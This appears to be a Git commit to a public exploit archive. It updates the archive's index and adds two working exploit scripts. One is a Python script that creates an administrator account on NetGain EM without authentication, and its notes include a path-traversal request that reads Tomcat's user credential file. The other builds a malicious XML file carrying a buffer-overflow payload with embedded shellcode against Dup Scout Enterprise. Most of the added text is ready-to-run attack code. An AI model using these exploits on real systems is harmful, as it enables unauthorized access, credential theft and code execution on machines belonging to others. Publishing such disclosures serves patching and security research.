DB: 2017-05-25
2 new exploits Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034) Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
This commit is contained in:
parent
2907a841a7
commit
07c41df34d
3 changed files with 186 additions and 2 deletions
|
@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
|
|||
18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
|
||||
18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
|
||||
18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
|
||||
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
|
||||
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
|
||||
18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
|
||||
18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
|
||||
18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
|
||||
|
@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
|
|||
28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
|
||||
28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
|
||||
28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
|
||||
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
|
||||
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
|
||||
28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
|
||||
28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
|
||||
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
|
||||
|
@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
|
|||
42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
|
||||
42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
|
||||
42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
|
||||
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
|
|||
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
|
||||
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
|
||||
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
122
platforms/jsp/webapps/42058.py
Executable file
122
platforms/jsp/webapps/42058.py
Executable file
|
@ -0,0 +1,122 @@
|
|||
'''
|
||||
# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
|
||||
# Date: 2017-05-21
|
||||
# Exploit Author: f3ci
|
||||
# Vendor Homepage: http://www.netgain-systems.com
|
||||
# Software Link: http://www.netgain-systems.com/free-edition-download/
|
||||
# Version: <= v7.2.647 build 941
|
||||
# Tested on: Windows 7
|
||||
|
||||
Add User Account with Admin Privilege without Login
|
||||
----------------------------------------------
|
||||
We can create user and give admin privilege to user which we have made
|
||||
without login.
|
||||
Because this app does not check the session on this request
|
||||
|
||||
|
||||
Local File Inclusion
|
||||
----------------------------------------------
|
||||
Normal Request:
|
||||
|
||||
POST /u/jsp/log/download_do.jsp HTTP/1.1
|
||||
Host: 192.168.0.21:8081
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.0.21:8081/u/index.jsp
|
||||
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 18
|
||||
|
||||
filename=iossd.log
|
||||
|
||||
We can download another file with change value on filename parameter and
|
||||
also we can send this request without login.
|
||||
|
||||
Example:
|
||||
|
||||
POST /u/jsp/log/download_do.jsp HTTP/1.1
|
||||
Host: 192.168.0.21:8081
|
||||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
|
||||
Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.0.21:8081/u/index.jsp
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 18
|
||||
|
||||
filename=../../tomcat/conf/tomcat-users.xml
|
||||
'''
|
||||
#!/usr/local/bin/python
|
||||
# Exploit Title: Add User Account with Admin Privilege without Login
|
||||
# Date: 2017-05-21
|
||||
# Exploit Author: f3ci
|
||||
# Vendor Homepage: http://www.netgain-systems.com
|
||||
# Software Link: http://www.netgain-systems.com/free-edition-download/
|
||||
# Version: <= v7.2.647 build 941
|
||||
# Tested on: Windows 7
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
try:
|
||||
def create():
|
||||
ip = str(sys.argv[1])
|
||||
port = str(sys.argv[2])
|
||||
user = str(sys.argv[3])
|
||||
passwd = str(sys.argv[4])
|
||||
|
||||
print "\033[1;32m[+]\033[1;m Try to Create user"
|
||||
url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
|
||||
data= {
|
||||
'new': "true",
|
||||
'id': "",
|
||||
'name': user,
|
||||
'dname': "foobar",
|
||||
'password': passwd,
|
||||
'password2': passwd,
|
||||
'description': "",
|
||||
'emails': "foo@bar.com",
|
||||
'mobileNumber': "000000",
|
||||
'loginAttempts': "5",
|
||||
}
|
||||
response = requests.post(url, data=data)
|
||||
status = response.status_code
|
||||
if status == 200:
|
||||
print "\033[1;32m[+]\033[1;m Success!!"
|
||||
role()
|
||||
else:
|
||||
print "\033[91m[-]\033[91;m Create User Failed"
|
||||
|
||||
|
||||
def role():
|
||||
ip = str(sys.argv[1])
|
||||
port = str(sys.argv[2])
|
||||
user = str(sys.argv[3])
|
||||
passwd = str(sys.argv[4])
|
||||
|
||||
print "\033[1;32m[+]\033[1;m Get admin role"
|
||||
url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
|
||||
data= {
|
||||
'name': "admin",
|
||||
'description': "Administrator",
|
||||
'users': [user,"admin"],
|
||||
}
|
||||
response = requests.post(url, data=data)
|
||||
status = response.status_code
|
||||
if status == 200:
|
||||
print "\033[1;32m[+]\033[1;m Success!!"
|
||||
print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
|
||||
else:
|
||||
print "\033[91m[-]\033[91;m Get admin role Failed"
|
||||
|
||||
create();
|
||||
|
||||
except:
|
||||
print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
|
||||
print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])
|
60
platforms/windows/local/42059.py
Executable file
60
platforms/windows/local/42059.py
Executable file
|
@ -0,0 +1,60 @@
|
|||
author = '''
|
||||
|
||||
##############################################
|
||||
# Created: ScrR1pTK1dd13 #
|
||||
# Name: Greg Priest #
|
||||
# Mail: ScR1pTK1dd13.slammer@gmail.com #
|
||||
##############################################
|
||||
|
||||
# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
|
||||
# Date: 2017.05.24
|
||||
# Exploit Author: Greg Priest
|
||||
# Version: Dup Scout Enterprise v9.7.18
|
||||
# Tested on: Windows7 x64 HUN/ENG Professional
|
||||
'''
|
||||
|
||||
|
||||
import os
|
||||
import struct
|
||||
|
||||
overflow = "A" * 1536
|
||||
jmp_esp = "\x94\x21\x1C\x65"
|
||||
#651F20E5
|
||||
#651F214E
|
||||
#652041ED
|
||||
nop = "\x90" * 16
|
||||
esp = "\x8D\x44\x24\x4A"
|
||||
jmp = "\xFF\xE0"
|
||||
nop2 = "\x90" * 70
|
||||
nSEH = "\x90\x90\xEB\x05"
|
||||
SEH = "\x80\x5F\x1C\x90"
|
||||
#"\x80\x5F\x1C\x65"
|
||||
#6508F78D
|
||||
#650E129F
|
||||
#651C5F80
|
||||
shellcode =(
|
||||
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
||||
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
||||
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
||||
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
||||
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
||||
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
||||
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
||||
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
||||
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
||||
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
||||
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
||||
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
||||
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
||||
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
||||
|
||||
crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
|
||||
|
||||
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
|
||||
exploit = open('Ev1l.xml', 'w')
|
||||
exploit.write(evil)
|
||||
exploit.close()
|
||||
|
||||
print "Ev1l.xml raedy!"
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue